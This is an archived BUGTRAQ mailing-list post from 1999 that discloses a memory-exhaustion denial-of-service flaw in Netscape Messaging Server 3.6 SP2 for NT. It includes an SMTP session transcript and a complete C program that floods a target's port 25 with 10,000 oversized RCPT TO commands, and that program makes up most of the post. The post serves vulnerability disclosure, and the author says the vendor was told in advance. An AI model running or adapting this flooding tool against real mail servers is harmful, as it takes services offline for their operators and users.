I've discussed with Netscape's engineer for 7 weeks. about RCPT TO vulnerability. I reported them on 7th Sep. as followings... 220 victim.workgroup ESMTP server (Netscape Messaging Server - Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900 helo rcpt2 250 victim.workgroup mail from : rcpt2 250 Sender <rcpt2> Ok rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes 250 Recipient <rcpt2@aaaaaaaaaaaa.... rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes 250 Recipient <rcpt2@aaaaaaaaaaaa.... ... 10,000 times ... Then victim server's allocated memory size was increased up to no more available memory and it's never been free after that. CPU meter indicated 100% during receiving RCPT TO. I tested on 128 MB RAM and I have no more physical memory after 50 minutes. I tested at Netscape Messaging Server 3.6 SP2 for NT. Netscape said that they will release Messaging Server 4.15 for NT on December and will fix this problem. I guess they will fix this and other problems at the same time... I think vulnerability should be fixed soon with patch and public announce. I've already said to Netscape that I post this to BUGTRAQ. Examination code(rcpt2.c) for YOUR server is following... ------------- cut here ----------------------------------------- /*************************************************************** You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT whether vulnerable for too much RCPT TO or not. by Nobuo Miwa, LAC Japan 28th Oct. 1999 http://www.lac.co.jp/security/ ****************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define STR_HELO "HELO rcpt2\n" #define STR_MAILFROM "MAIL FROM:rcpt2\n" #define RCPT2_LENGTH 8000 #define RCPT2_NUMBER 10000 int openSocket(struct sockaddr_in *si, char *hostIPaddr) { int port=25, sd, rt ; long li ; struct hostent *he; si->sin_addr.s_addr = inet_addr(hostIPaddr); si->sin_family = AF_INET; si->sin_port = htons (port); sd = socket (si->sin_family, SOCK_STREAM, 0); if (sd == -1) return (-1); rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in)); if ( rt < 0 ) { close(sd); return(-1); } return(sd) ; } void sendRCPT2(int sd) { char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80]; int rt, i; memset( tmpStr, 0, sizeof(tmpStr) ) ; recv( sd, tmpStr, sizeof(tmpStr), 0 ); printf("%s",tmpStr); printf("%s",STR_HELO); send( sd, STR_HELO, strlen(STR_HELO), 0 ); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv( sd, tmpStr, sizeof(tmpStr), 0 ); if ( rt>0 ) printf("%s",tmpStr); printf("%s",STR_MAILFROM); send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv(sd, tmpStr, sizeof(tmpStr), 0); if ( rt>0 ) printf("%s",tmpStr); strcpy( rcptStr, "RCPT TO: rcpt2@" ) ; while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ; strcat( rcptStr, "\n" ); for ( i=0 ; i<RCPT2_NUMBER ; i++ ) { printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr)); send( sd, rcptStr, strlen(rcptStr), 0 ); rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 ); strncpy( strn, tmpStr, 60 ) ; if ( rt>0 ) printf("%s \n",strn); } return; } int main (int argc, char *argv[]) { char hostIPaddr[80], *cc, *pfft; int sd = 0; struct sockaddr_in si; printf("You can use ONLY for YOUR Messaging Server 3.6\n"); if (argc != 2) { printf("Usage: %s IPaddress \n",argv[0]); exit(1); } else strcpy (hostIPaddr, argv[1]); sd = openSocket(&si,hostIPaddr); if (sd < 1) { printf("failed!\n"); exit(-1); } sendRCPT2( sd ); close (sd); exit(0); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:08 PDT